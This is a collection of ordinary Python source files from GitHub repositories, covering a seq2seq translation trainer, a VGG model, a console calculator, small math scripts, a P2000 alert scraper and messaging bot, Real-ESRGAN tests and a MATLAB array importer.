train(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion, lang1, lang2, max_length=MAX_LENGTH):\n encoder_hidden = encoder.initHidden()\n\n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n input_length = input_tensor.size(0)\n target_length = target_tensor.size(0)\n\n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n loss = 0\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(\n input_tensor[ei], encoder_hidden)\n encoder_outputs[ei] = encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=device)\n\n decoder_hidden = encoder_hidden\n\n use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n\n original = target_tensor \n translated = torch.zeros((target_length, len(lang2.index2word.keys())))\n if use_teacher_forcing:\n # Teacher forcing: Feed the target as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n\n # ten.append(decoder_output)\n translated[di,:] = decoder_output\n\n loss += criterion(decoder_output, target_tensor[di])\n decoder_input = target_tensor[di] # Teacher forcing\n\n else:\n # Without teacher forcing: use its own predictions as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n\n # ten.append(decoder_output)\n translated[di,:] = decoder_output\n\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n\n loss += criterion(decoder_output, target_tensor[di])\n if decoder_input.item() == EOS_token:\n break\n\n # print(translated.shape)\n # print(translated)\n\n # print(original.shape)\n # print(original)\n\n # print(decoder_output.shape)\n # print(convert(lang2.index2word, translated))\n # print(convert_given(lang2.index2word, original))\n \n hypothesis = convert(lang2.index2word, translated)\n reference = [convert_given(lang2.index2word, original)]\n # 
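# debug print: per-sentence BLEU with smoothing, to avoid zero n-gram counts on short sentences\n # 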
print(\"BLEU: \", sentence_bleu(reference, hypothesis, smoothing_function=chencherry.method1))\n\n loss.backward()\n\n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return loss.item() / target_length, hypothesis, reference, encoder, decoder\n\n\ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n es = s / (percent)\n rs = es - s\n return '%s (- %s)' % (asMinutes(s), asMinutes(rs))\n\ndef validation(encoder, decoder, lang1, lang2):\n\n start = time.time()\n plot_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n # encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n # decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n validation_pairs = [tensorsFromPair(random.choice(valid_pairs))\n for i in range(n_iters)]\n criterion = nn.NLLLoss()\n\n n_iters = len(valid_pairs)\n bleu = 0\n for iter in range(1, n_iters + 1):\n valid_pair = validation_pairs[iter - 1]\n input_tensor = valid_pair[0]\n target_tensor = valid_pair[1]\n\n loss, hypothesis, reference, encoder, decoder = train(input_tensor, target_tensor, encoder,\n decoder, encoder_optimizer, decoder_optimizer, criterion, lang1, lang2)\n print_loss_total += loss\n plot_loss_total += loss\n\n bleu += sentence_bleu(reference, hypothesis, smoothing_function=chencherry.method1)\n\n print('(VALID) %s (%d %d%%) loss: %.4f bleu: %.4f' % (timeSince(start, iter / n_iters), iter, iter / n_iters * 100, print_loss_avg, bleu / print_every))\n\n # showPlot(plot_losses)\n\n\n # for index in pairs:\n # evaluate(encoder, decoder, pairs[index])\n\ndef trainIters(encoder, decoder, n_iters, lang1, lang2, print_every=1000, plot_every=100, learning_rate=0.01): # original learning_rate .01\n start = time.time()\n plot_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n training_pairs = [tensorsFromPair(random.choice(train_pairs))\n for i in range(n_iters)]\n criterion = nn.NLLLoss()\n\n bleu = 0\n for iter in range(1, n_iters + 1):\n training_pair = training_pairs[iter - 1]\n input_tensor = training_pair[0]\n target_tensor = training_pair[1]\n\n loss, hypothesis, reference, encoder, decoder = train(input_tensor, target_tensor, encoder,\n decoder, encoder_optimizer, decoder_optimizer, criterion, lang1, lang2)\n print_loss_total += loss\n plot_loss_total += loss\n\n bleu += sentence_bleu(reference, hypothesis, smoothing_function=chencherry.method1)\n\n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('(TRAIN) %s (%d %d%%) loss: %.4f bleu: %.4f' % (timeSince(start, iter / n_iters), iter, iter / n_iters * 100, print_loss_avg, bleu / print_every))\n\n saveModel(encoder, \"./model/encoder-\" + str(iter) + \"-\" + str(bleu/iter) + \".pth\")\n saveModel(decoder, \"./model/decoder-\"+ str(iter) + \"-\" + str(bleu/iter) + \".pth\")\n\n bleu = 0\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n showPlot(plot_losses)\n\ndef showPlot(points):\n plt.figure()\n fig, ax = plt.subplots()\n # this locator puts ticks at regular intervals\n loc = ticker.MultipleLocator(base=0.2)\n ax.yaxis.set_major_locator(loc)\n 
plt.plot(points)\n\n\ndef evaluate(encoder, decoder, sentence, max_length=MAX_LENGTH):\n with torch.no_grad():\n input_tensor = tensorFromSentence(input_lang, sentence)\n input_length = input_tensor.size()[0]\n encoder_hidden = encoder.initHidden()\n\n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei],\n encoder_hidden)\n encoder_outputs[ei] += encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=device) # SOS\n\n decoder_hidden = encoder_hidden\n\n decoded_words = []\n decoder_attentions = torch.zeros(max_length, max_length)\n\n for di in range(max_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n decoder_attentions[di] = decoder_attention.data\n topv, topi = decoder_output.data.topk(1)\n if topi.item() == EOS_token:\n decoded_words.append('')\n break\n else:\n decoded_words.append(output_lang.index2word[topi.item()])\n\n decoder_input = topi.squeeze().detach()\n\n return decoded_words, decoder_attentions[:di + 1]\n\n\ndef evaluateSet(encoder, decoder, setlist):\n mean_bleu = 0\n bleu = 0\n for i in range(len(setlist)):\n pair = setlist[i]\n print('>', pair[0])\n print('=', pair[1])\n output_words, attentions = evaluate(encoder, decoder, pair[0])\n output_sentence = ' '.join(output_words)\n\n # bleu = sentence_bleu(reference, hypothesis, smoothing_function=chencherry.method1)\n # mean_bleu += bleu\n\n print('<', output_sentence)\n print('~ bleu: ', bleu)\n print('\\n\\n~ mean bleu: ', mean_bleu/len(setlist))\n\n\n\ndef evaluateRandomly(encoder, decoder, n=10):\n for i in range(n):\n pair = random.choice(pairs)\n print('>', pair[0])\n print('=', pair[1])\n output_words, attentions = evaluate(encoder, decoder, pair[0])\n output_sentence = ' '.join(output_words)\n print('<', output_sentence)\n print('')\n\n\ninput_lang, output_lang, train_pairs, valid_pairs = prepareData('eng', 'ger', False)\nprint(random.choice(train_pairs))\n\nhidden_size = 256\nencoder1 = EncoderRNN(input_lang.n_words, hidden_size).to(device)\nattn_decoder1 = AttnDecoderRNN(hidden_size, output_lang.n_words, dropout_p=0.1).to(device)\n\nif len(sys.argv) > 1 and sys.argv[1] == 'train':\n trainIters(encoder1, attn_decoder1, 75000, input_lang, output_lang, print_every=5000)\nelif len(sys.argv) > 1 and sys.argv[1] == 'test':\n encoder1 = loadModel(encoder1, \"./model/encoder-best.pth\")\n attn_decoder1 = loadModel(attn_decoder1, \"./model/decoder-best.pth\")\n # validation(encoder1, attn_decoder1, input_lang, output_lang)\n evaluateSet(encoder1, attn_decoder1, valid_pairs)\nelif len(sys.argv) > 1 and sys.argv[1] == 'translate':\n translation(encoder1, attn_decoder1, input_lang, output_lang)\n","repo_name":"tym0027/eece7398-hw3","sub_path":"NMT.py","file_name":"NMT.py","file_ext":"py","file_size_in_byte":18052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25643102643","text":"from tensorflow.keras import layers, models, Model, Sequential\n\n\nclass VGGNet(object):\n def __init__(self, img_height, img_width, class_num, name):\n self.img_height = img_height\n self.img_width = img_width\n self.class_num = class_num\n self.name = name\n\n def vgg_arch(self, feature):\n \"\"\"\n VGG Model核心模块\n :param feature: 特征层\n :return: Model\n \"\"\"\n input_image = layers.Input(shape=(self.img_height, self.img_width, 3), dtype='float32')\n x = 
feature(input_image)\n x = layers.Flatten()(x)\n x = layers.Dropout(rate=0.5)(x)\n x = layers.Dense(4096, activation='relu')(x)\n x = layers.Dropout(rate=0.5)(x)\n x = layers.Dense(4096, activation='relu')(x)\n x = layers.Dense(self.class_num)(x)\n output = layers.Softmax()(x)\n model = models.Model(inputs=input_image, outputs=output)\n return model\n\n def features(self, cfg):\n \"\"\"\n VGG Modle特征层\n :param cfg: 特征层参数配置\n :return: 特征层\n \"\"\"\n feature_layers = []\n for v in cfg:\n if v == \"M\":\n feature_layers.append(layers.MaxPool2D(pool_size=2, strides=2))\n else:\n conv2d = layers.Conv2D(v, kernel_size=3, padding='same', activation='relu')\n feature_layers.append(conv2d)\n return Sequential(feature_layers, name='feature')\n\n def vgg(self):\n \"\"\"\n VGG Model\n :param model_name:VGG系列模型的名称\n :return: model\n \"\"\"\n try:\n cfg = cfgs[self.name]\n except:\n print(f'Warning: model number {self.name} not supported.')\n exit(-1)\n model = self.vgg_arch(self.features(cfg))\n\n return model\n\n\ncfgs = {\n 'vgg11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'vgg13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'vgg16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],\n 'vgg19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],\n}","repo_name":"KDD2018/Machine-Learning","sub_path":"cv/CNN_Model/VGGNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"3884913907","text":"import sys\nimport math\nname=input(\"Please enter your name\")\nwhile name.isalpha()==False or len(name)<4 :\n if ' ' in name :\n break\n else:\n print(\"THE NAME YOU ENTERED IS INCORRECT\")\n name=input('Enter name again')\nprint(\"WELCOME! NOW YOU ARE READY TO USE CALCULATOR \\n YOU HAVE FOLLOWING OPTIONS\")\ndoagain='yes'\nwhile doagain=='yes':\n print(\"Select operation\")\n print(\"1.Add 2.Subtract\")\n print(\"3.Multiply 4.Modulous\")\n print(\"5.square root 6. 
Square\")\n print(\"7.division\")\n select=int(input(\"your choice operation 1/2/3/4/5/6/7 \"))\n if select==1:\n num1=int(input(\"Enter your number\"))\n addagain='yes'\n while addagain=='yes':\n num2=int(input(\"Enter your number again\"))\n result=num1+num2\n addagain=input(\"do you want to add more number\")\n print(\"The sum of the given number is \",result)\n elif select==2:\n a=int(input(\"Enter your first number\"))\n subtractagain='yes'\n a=0\n b=0\n while subtractagain=='yes':\n b=int(input(\"Enter the number you want to subtract\"))\n c=a-b\n subtractagain=input('Do you want to subtract more number')\n print(\"The resulrt is\",c)\n elif select==3:\n num1 = int(input(\"Enter the first number\"))\n mulagain='yes'\n while mulagain=='yes':\n num2=int(input(\"Enter your number \"))\n product=num1*num2\n mulagain=input(\"do you want to multiply more number\")\n print(\"the product of the given number is\",product)\n elif select==4:\n num1 = int(input(\"Enter the first number\"))\n num2 = int(input(\"Enter the second number\"))\n rem=num1%num2\n print(\"The remainder of the given division number is\",rem)\n elif select==5:\n num1 = int(input(\"Enter the number\"))\n sqroot=math.sqrt(num1)\n print(\"The square root of the given number is \",sqroot)\n elif select==6:\n num1 = int(input(\"Enter the number\"))\n square=num1*num1\n square=int(square)\n print(\"The square of the given number is \",square)\n elif select==7:\n num1 = int(input(\"Enter the first number\"))\n num2 = int(input(\"Enter the second number\"))\n quoitent=num1/num2\n print(\"The Quoitent of the given number is\",float(quoitent))\n else:\n sys.exit(\"OPERATION OUT OF THE RANGE\")\n doagain=input(\"\\nYou want to do other calculation:(yes/no) \")\n","repo_name":"Nishan52/first-group-project","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"42958239986","text":"# 11653번 소인수분해\n# https://www.acmicpc.net/problem/11653\n\nn = int(input())\n\nwhile n != 1:\n for i in range(2, n+1):\n if n % i == 0:\n n = n // i\n print(i)\n break\n","repo_name":"Johyonghoon/algorithm","sub_path":"backjoon/number_theory/11653.py","file_name":"11653.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72108042222","text":"from time import time\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.callbacks import TensorBoard\n\nmodel = Sequential()\n\nmodel.add(Dense(10, input_shape=(784,)))\nmodel.add(Activation('softmax'))\n\nmodel.compile(optimizer='sgd', loss='categorical_crossentropy')\n\ntensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\n\nmodel.fit(partial_x_train,\n partial_y_train,\n epochs=1000,\n batch_size=1000,\n validation_data=(x_val, y_val),\n verbose=1, callbacks=[tensorboard])\n\n","repo_name":"abal6725/TensorFlow","sub_path":"TensorBoard.py","file_name":"TensorBoard.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72076065264","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 19 14:21:35 2022\r\n\r\n@author: Mr Kakarotto\r\n\"\"\"\r\n\r\nimport numpy as np\r\ndata=[1,2,2,3,1,4,6,9,20,4,4,9,10,10,12,12,13,13,14,13]\r\ndata1=sorted(data)\r\nprint(\"Sorted data1 is\",data1)\r\nx=[]\r\ny=[] \r\nfor i in 
range(len(data1)):\r\n    # i == 0 must be special-cased: data1[i-1] would wrap to the last element\r\n    if i == 0 or data1[i-1] != data1[i]:\r\n        x.append(data1[i])\r\nprint(\"The value of x is\",x)\r\n\r\nfor i in range(len(x)):\r\n    k=0\r\n    for j in range(len(data1)):\r\n        if x[i]==data1[j]:\r\n            k=k+1\r\n    y.append(k)\r\nprint(\"The value of y is\",y) \r\n\r\n# first four raw moments E[X**i] of the empirical distribution\r\nmew=[]\r\nfor i in range(4):\r\n    z=0\r\n    for j in range(len(x)):\r\n        z=z+((x[j]**i*y[j])/np.sum(y))\r\n    mew.append(z)\r\nprint(\"The value of mew is\",mew) \r\n \r\n","repo_name":"Shafiq5472/UNi-work","sub_path":"uni work/mew calculation from raw data.py","file_name":"mew calculation from raw data.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"74944404143","text":"import pandas as pd\nfrom geocode import get_coordinates_from_string\nfrom send_message import send_body_message, send_location_message\nimport time\nimport json\n\n\n# import capcodes from json file\nwith open(\"capcodes-json.json\", \"r\") as file:\n    capcodes = json.load(file)\n\ndef parse_url_and_clean(city='Amsterdam'):\n\n    # url to parse\n    url = 'http://p2000.brandweer-berkel-enschot.nl/LiveMonitor.aspx'\n\n    ###\n    # Get tables from URL, and format into table with columns:\n    # Index, Capcode, Datumtijd, Message\n    # 2,\t2029568,\t30-09-23 23:17:35,\tP 2 BAD-02 Liftopsluiting Binnenkadijk Amsterd...\n\n    tables = pd.read_html(url)\n    tables[2]\n    # select first 10 rows, but skip first row. second row is the header\n    df = tables[2][1:]\n    # set first row as header\n    df.columns = tables[2].iloc[1]\n    # drop first row\n    df = df.drop(df.index[0])\n\n    # get last 6 characters of the last column and set as new column, only if they are digits\n    df['incident'] = df['Message'].str[-6:].str.extract('(\\d+)', expand=False)\n\n\n    # make new df with only rows that contain 'Amsterdam'\n\n    df_amsterdam = df[df['Message'].str.contains(city, case=False)]\n\n    if df_amsterdam.empty:\n        print(f'No new incidents in {city}')\n        send_body_message('🚨🚨🚨🚨🚨🚨🚨')\n        time.sleep(0.9)\n        send_body_message(f'Geen recente P2000 meldingen in {city}')\n        time.sleep(0.9)\n        send_body_message('_Einde bericht_')\n        exit()\n\n    number_of_incidents = 3\n\n    # get all messages from the last three incident numbers\n    last_three = df_amsterdam[df_amsterdam['incident'].isin(df_amsterdam['incident'].unique()[-number_of_incidents:])]\n\n    # merge rows with the same incident number, keeping the capcodes, and first time and message\n    last_three = last_three.groupby('incident').agg({'Capcode': lambda x: x.tolist(), 'Datumtijd': 'first', 'Message': 'first'}).reset_index()\n\n    # turn the dataframe into a list\n    last_three = last_three.values.tolist()\n\n    return last_three\n\ndef format_list(last_three, city='Amsterdam'):\n    # replace the capcodes with the corresponding names, if they do not exist, replace with 'onbekend'\n    for row in last_three:\n        row[1] = [capcodes.get(item, '‼️ Code onbekend') for item in row[1]]\n    # print the list\n\n\n    # turn the list into a formatted string for a telegram bot message\n    last_three_formatted = [\n        f'{row[2]}: Incident {row[0]}\\n{row[1]}\\n{row[3]}\\n' for row in last_three\n    ]\n\n    send_body_message('🚨🚨🚨🚨🚨🚨🚨')\n    time.sleep(0.9)\n    send_body_message(f\"P2000 meldingen\\nRegio {city}\")\n    time.sleep(0.9)\n    for row in last_three:\n        time_only = row[2].split(' ')[1]\n        messages = '\\n'.join(row[1])\n        # body = f'{time}\\nIncident {row[0]}\\n{row[3]}\\n{messages}\\n'\n        body = f'*Tijd*: {time_only}\\n*Bericht*: {row[3]}\\n*Eenheden opgeroepen*\\n{messages}\\n'\n        print(body)\n        coordinates, label, 
location_type = get_coordinates_from_string(row[3])\n send_body_message(body)\n time.sleep(1.5)\n send_location_message(coordinates, label, f'Accurracy: {location_type}')\n time.sleep(3)\n send_body_message('_Einde bericht_')\n\n\nif __name__ == '__main__':\n last_three = parse_url_and_clean()\n format_list(last_three)\n\ndef run_p2000_bot(city='Amsterdam'):\n last_three = parse_url_and_clean(city)\n format_list(last_three, city)","repo_name":"kurkmeister/p2000-whatsapp-bot","sub_path":"p2000_bot.py","file_name":"p2000_bot.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20395044453","text":"import numpy as np\nfrom basicsr.archs.rrdbnet_arch import RRDBNet\n\nfrom realesrgan.utils import RealESRGANer\n\n\ndef test_realesrganer():\n # initialize with default model\n restorer = RealESRGANer(\n scale=4,\n model_path='experiments/pretrained_models/RealESRGAN_x4plus.pth',\n model=None,\n tile=10,\n tile_pad=10,\n pre_pad=2,\n half=False)\n assert isinstance(restorer.model, RRDBNet)\n assert restorer.half is False\n # initialize with user-defined model\n model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)\n restorer = RealESRGANer(\n scale=4,\n model_path='experiments/pretrained_models/RealESRGAN_x4plus_anime_6B.pth',\n model=model,\n tile=10,\n tile_pad=10,\n pre_pad=2,\n half=True)\n # test attribute\n assert isinstance(restorer.model, RRDBNet)\n assert restorer.half is True\n\n # ------------------ test pre_process ---------------- #\n img = np.random.random((12, 12, 3)).astype(np.float32)\n restorer.pre_process(img)\n assert restorer.img.shape == (1, 3, 14, 14)\n # with modcrop\n restorer.scale = 1\n restorer.pre_process(img)\n assert restorer.img.shape == (1, 3, 16, 16)\n\n # ------------------ test process ---------------- #\n restorer.process()\n assert restorer.output.shape == (1, 3, 64, 64)\n\n # ------------------ test post_process ---------------- #\n restorer.mod_scale = 4\n output = restorer.post_process()\n assert output.shape == (1, 3, 60, 60)\n\n # ------------------ test tile_process ---------------- #\n restorer.scale = 4\n img = np.random.random((12, 12, 3)).astype(np.float32)\n restorer.pre_process(img)\n restorer.tile_process()\n assert restorer.output.shape == (1, 3, 64, 64)\n\n # ------------------ test enhance ---------------- #\n img = np.random.random((12, 12, 3)).astype(np.float32)\n result = restorer.enhance(img, outscale=2)\n assert result[0].shape == (24, 24, 3)\n assert result[1] == 'RGB'\n\n # ------------------ test enhance with 16-bit image---------------- #\n img = np.random.random((4, 4, 3)).astype(np.uint16) + 512\n result = restorer.enhance(img, outscale=2)\n assert result[0].shape == (8, 8, 3)\n assert result[1] == 'RGB'\n\n # ------------------ test enhance with gray image---------------- #\n img = np.random.random((4, 4)).astype(np.float32)\n result = restorer.enhance(img, outscale=2)\n assert result[0].shape == (8, 8)\n assert result[1] == 'L'\n\n # ------------------ test enhance with RGBA---------------- #\n img = np.random.random((4, 4, 4)).astype(np.float32)\n result = restorer.enhance(img, outscale=2)\n assert result[0].shape == (8, 8, 4)\n assert result[1] == 'RGBA'\n\n # ------------------ test enhance with RGBA, alpha_upsampler---------------- #\n restorer.tile_size = 0\n img = np.random.random((4, 4, 4)).astype(np.float32)\n result = restorer.enhance(img, outscale=2, alpha_upsampler=None)\n assert 
result[0].shape == (8, 8, 4)\n assert result[1] == 'RGBA'\n","repo_name":"xinntao/Real-ESRGAN","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":23737,"dataset":"github-code","pt":"91"} +{"seq_id":"6944867000","text":"import re\nfrom collections import deque\nfrom functools import cache\n\nf = open(\"input.txt\", 'r')\n# f = open(\"test_input.txt\", 'r')\ninput = f.read().splitlines()\ncount_monkeys = 1 + input.count(\"\")\n\nclass NumOps:\n def __init__(self, operation, number) -> None:\n self.operation = operation\n self.number = int(number)\n self.next = None\n self.end = None\n\n def is_divisible(self, divide_by):\n node = self\n mod_result = 0\n while node is not None:\n if node.operation == '+':\n mod_result = (mod_result + (node.number % divide_by)) % divide_by\n elif node.operation == '*':\n mod_result = (mod_result * (node.number % divide_by)) % divide_by\n else:\n mod_result = mod_result ** 2 % divide_by\n node = node.next\n \n return mod_result == 0\n\n def __repr__(self) -> str:\n node = self\n mod_result = 0\n while node is not None:\n if node.operation == '+':\n mod_result = (mod_result + (node.number))\n elif node.operation == '*':\n mod_result = (mod_result * (node.number))\n else:\n mod_result = mod_result ** 2\n node = node.next\n return str(mod_result)\n\n\nclass Monkey:\n def __init__(self) -> None:\n self.items = deque()\n self.operation = None\n self.divisible_by = None\n self.true_throw = None\n self.false_throw = None\n self.inspect_count = 0\n\n def __repr__(self) -> str:\n return \"Monkey with items \" + str(self.items) + \" operations \" + str(self.operation) + \" divisble by \" + str(self.divisible_by) + \" \" + str(self.true_throw) + \" \" + str(self.false_throw) + \" risk \" + str(self.inspect_count)\n\ndef divisible_by(lst, divide_num):\n remainder_total = 0\n for num in lst:\n remainder_total += num % divide_num\n return remainder_total % divide_num == 0\n\nmonkeys = []\ncur_monkey = None\n\nfor line in input:\n if line.find(\"Monkey\") == 0:\n if cur_monkey is not None:\n monkeys.append(cur_monkey)\n cur_monkey = Monkey()\n elif line.strip().find(\"Starting\") == 0:\n for i in line[18:].split(\", \"):\n cur_monkey.items.append(NumOps('+', i))\n elif line.strip().find(\"Operation\") == 0:\n regex = re.compile(\"Operation: new = old ([*+]) ([0-9]+|old)\")\n e = regex.match(line.strip())\n cur_monkey.operation = e.groups()\n elif line.strip().find(\"Test\") == 0:\n regex = re.compile(\"Test: divisible by ([0-9]+)\")\n e = regex.match(line.strip())\n cur_monkey.divisible_by = int(e.group(1))\n elif line.strip().find(\"If true\") == 0:\n regex = re.compile(\"If true: throw to monkey ([0-9]+)\")\n e = regex.match(line.strip())\n cur_monkey.true_throw = int(e.group(1))\n elif line.strip().find(\"If false\") == 0:\n regex = re.compile(\"If false: throw to monkey ([0-9]+)\")\n e = regex.match(line.strip())\n cur_monkey.false_throw = int(e.group(1))\n\nmonkeys.append(cur_monkey)\n\nfor _ in range(10000):\n print(_)\n for monkey in monkeys:\n while len(monkey.items) > 0:\n result = monkey.items.popleft()\n if monkey.operation == ('*', 'old'):\n new_result = NumOps(\"**\", 2)\n else:\n new_result = NumOps(monkey.operation[0], monkey.operation[1])\n if result.end is None:\n result.end = new_result\n result.next = new_result\n else:\n result.end.next = new_result\n result.end = result.end.next\n if result.is_divisible(monkey.divisible_by):\n 
monkeys[monkey.true_throw].items.append(result)\n else:\n monkeys[monkey.false_throw].items.append(result)\n\n monkey.inspect_count += 1\n\n# print(monkeys)\n\nsorted_result = sorted(monkeys, key=lambda x: x.inspect_count, reverse=True)\n# print(sorted_result)\nprint(sorted_result[0].inspect_count * sorted_result[1].inspect_count)","repo_name":"andylin2004/AOC-2022","sub_path":"Day11/Part2.py","file_name":"Part2.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25931887679","text":"import sys\n\ndef log(s):\n print(s, file=sys.stderr)\n\nds = [2**29] * 20 + [2**(29-i) for i in range(30)]\n\nnums = []\nn = 1\ni = 0\nwhile i < len(ds):\n m = n + ds[i]\n if m in nums or n in nums:\n n += 1\n continue\n nums += [n, m]\n i += 1\n\nT = int(input())\n\nfor _ in range(T):\n N = int(input())\n print(*nums)\n sys.stdout.flush()\n\n bs = [int(x) for x in input().split()]\n bs = sorted(bs)\n pairs = [(bs[i], bs[i + 1]) for i in range(0, 100, 2)]\n pairs = sorted(pairs, key=lambda x:x[1]-x[0], reverse=True)\n\n bs1 = []\n bs2 = []\n for n1, n2 in pairs:\n if n1 > n2:\n n1, n2 = n2, n1\n if sum(bs1) < sum(bs2):\n bs1 += [n2]\n bs2 += [n1]\n else:\n bs1 += [n1]\n bs2 += [n2]\n\n for i in range(0, 100, 2):\n n1, n2 = nums[i:i+2]\n if n1 > n2:\n n1, n2 = n2, n1\n if sum(bs1) < sum(bs2):\n bs1 += [n2]\n bs2 += [n1]\n else:\n bs1 += [n1]\n bs2 += [n2]\n\n print(*bs1)\n sys.stdout.flush()\n","repo_name":"hirosuzuki/GoogleCodeJam2022","sub_path":"1a/EqualSum.py","file_name":"EqualSum.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"23523309934","text":"\"\"\"Import MATLAB arrays into IDTxl.\n\nModule with functions to import matrices from matfiles (version>7.3, hdf5)\nto IDTxL.\n\nFunctions in this module read the (neurophysiological) data from a Fieldtrip\nfile with the basic fields necessary for the MATLAB version TRENTOOL and create\na numpy array usable as input to TXL.\n\nprovides the functions:\n matarray2idtxlconverter(filename, arrayname, order) = takes a filename,\n the name of the array variable (arrayname) inside,\n and the order of sensor axis, time axisand (CHECK THIS!!)\n repetition axis (as a list)\n\n@author: Michael Wibral\n\"\"\"\n\nimport h5py\nimport numpy as np\n\n\ndef _matarray_2_numpyarray(file_name, array_name, order_list):\n \"\"\"Read Matlab hdf5 file into IDTxl.\n\n reads a matlab hdf5 file (\"-v7.3' or higher, .mat) with a SINGLE\n array inside and returns a numpy array with dimensions that\n are channel x time x trials, using np.swapaxes where necessary\n\n Created on Wed Mar 19 12:34:36 2014\n\n @author: Michael Wibral\n \"\"\"\n print('Converting matlab array from file (v7.3) to numpy array')\n # 1. create a python object that represents the hdf5 file on disk\n mat_file = h5py.File(file_name)\n # assert that at least one of the keys found at the top level\n # of the HDF file matches the name of the array we wanted\n assert array_name in mat_file.keys(), ('array {0} not in mat file or not '\n 'a variable at the top level'\n .format(array_name))\n\n # 2. Create an object for the matlab array (from the hdf5 hierachy)\n the_array = mat_file[array_name][()] # trailing [()] ensures everything is read\n print('From HDF5: ')\n print(the_array)\n # 3. Convert to numpyarray\n the_array = np.asarray(the_array)\n print('as numpy: ')\n print(the_array)\n\n # 4. 
swapaxes according to the information provided by the user\n the_array = reorder_array(the_array, order_list)\n\n return the_array\n\n\ndef reorder_array(the_array, order_list):\n # put time first as by agrreement in IDTxL\n time_dimension = order_list.index('time')\n if time_dimension != 1:\n the_array = np.swapaxes(the_array, 1, time_dimension)\n # also swap the list to reflect the new arrangement\n order_list[1], order_list[time_dimension] = (\n\t\t\t\t\t\t\t\t\torder_list[time_dimension], order_list[1])\n\n # put channel second\n channel_dimension = order_list.index('channel')\n if channel_dimension != 2:\n the_array = np.swapaxes(the_array, 2, channel_dimension)\n # also swap the list to reflect the new arrangement\n order_list[2], order_list[channel_dimension] = (\n\t\t\t\t\t\t\t\torder_list[channel_dimension], order_list[2])\n\n # put repetitions third - unnecessary in principle as n-1 permutations\n # are guaranteed to sort our array dimensions for n dimensions\n # assert order_list.index('repetition') == 3, print('something went wrong with reordering')\n\n # uncomment the following code when expanding\n # repetition_dimension = order_list.index('repetition')\n # if repetition_dimension !=2:\n # the_array = np.swapaxes(the_array,2,repetition_dimension)\n # # also swap the list to reflect the new arrangement\n # order_list[3], order_list[repetition_dimension] = \\\n # order_list[repetition_dimension], order_list[3]\n\n # put further dimensions fourth in future versions...\n return the_array\n\n\ndef matarray2idtxl(filename, array_name, order_list):\n print('Creating Python dictionary from matlab array: ' + array_name)\n NPData = _matarray_2_numpyarray(filename, array_name, order_list)\n print(NPData)\n label = [None] * NPData.shape[1]\n for n in range(0, NPData.shape[1]):\n label[n] = 